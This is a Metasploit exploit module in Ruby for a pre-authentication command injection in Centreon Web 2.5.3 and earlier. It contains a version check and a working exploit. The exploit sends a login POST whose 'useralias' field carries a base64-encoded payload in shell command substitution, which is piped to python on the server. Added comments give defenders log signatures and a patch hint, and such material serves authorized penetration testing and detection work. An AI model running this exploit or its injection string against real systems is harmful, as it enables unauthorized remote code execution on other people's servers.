rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/http/centreon_useralias_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
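# Metasploit module for the pre-authentication command execution issue in the
# Centreon Web login form (EDB 39501). Per the module description, Centreon
# Web <= 2.5.3 logs SQL errors through a shell `echo`, and the login screen
# reaches that code path before any authentication happens.
#
# Notes for defenders, taken from the requests this module builds:
# - The only input involved is the `useralias` POST field of index.php. Shell
#   command-substitution syntax in that field is never a legitimate login
#   name, so it is a reasonable signal to alert on in web server / WAF logs.
# - `check` treats every version up to and including 2.5.3 as affected, so
#   running a release newer than that is the remediation this module implies.
class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient

  Rank = ExcellentRanking

  # Registers module metadata and the user-configurable options.
  #
  # @param info [Hash] metadata passed in by the framework, merged through
  #   update_info with the values declared here.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Centreon Web Useralias Command Execution',
        'Description' => %q{
          Centreon Web Interface <= 2.5.3 utilizes an ECHO for logging SQL
          errors. This functionality can be abused for arbitrary code
          execution, and can be triggered via the login screen prior to
          authentication.
        },
        'Author' => [
          'h00die <[email protected]>', # module
          'Nicolas CHATELAIN <[email protected]>' # discovery
        ],
        'References' => [
          [ 'EDB', '39501' ]
        ],
        'License' => MSF_LICENSE,
        'Platform' => ['python'],
        'Privileged' => false,
        'Arch' => ARCH_PYTHON,
        'Targets' => [
          [ 'Automatic Target', {}]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2016-02-26',
        # Reliability, stability and side effects are all declared as unknown:
        # nothing in this file states how the target behaves after a run.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [ true, 'The URI of the Centreon Application', '/centreon/'])
      ], self.class
    )
  end

  # Passive version check: fetches the login page and compares the version
  # string printed there with 2.5.3. Nothing is injected by this method.
  #
  # @return [Exploit::CheckCode] Appears when a version <= 2.5.3 is parsed,
  #   Unknown when the server sent no response, Safe otherwise.
  def check
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'method' => 'GET'
    )
    # send_request_cgi returns nil when no response arrives (e.g. a timeout);
    # without this guard the res.body call below raises NoMethodError.
    return Exploit::CheckCode::Unknown unless res

    # The regexp literal must stay on the left of =~ so that the named capture
    # is assigned to the local variable `version`.
    /LoginInvitVersion"><br \/>[\s]+(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+<\/td>/ =~ res.body

    if version && Rex::Version.new(version) <= Rex::Version.new('2.5.3')
      vprint_good("Version Detected: #{version}")
      Exploit::CheckCode::Appears
    else
      # NOTE(review): this branch is also taken when no version string could be
      # parsed at all (customised or changed login page), so Safe here means
      # "no affected version was seen", not "confirmed patched".
      Exploit::CheckCode::Safe
    end
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
  end

  # Sends a single login POST to index.php. The `useralias` field carries the
  # base64-encoded payload wrapped in shell command substitution; `password`
  # is random filler. The response is not inspected.
  #
  # In server logs this appears as a login attempt whose username contains
  # `$(`, `base64 -d` and `python`.
  def exploit
    vprint_status('Sending malicious login')
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'method' => 'POST',
      'vars_post' =>
        {
          'useralias' => "$(echo #{Rex::Text.encode_base64(payload.encoded)} |base64 -d | python)\\",
          'password' => Rex::Text.rand_text_alpha(5)
        }
    )
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
  end
end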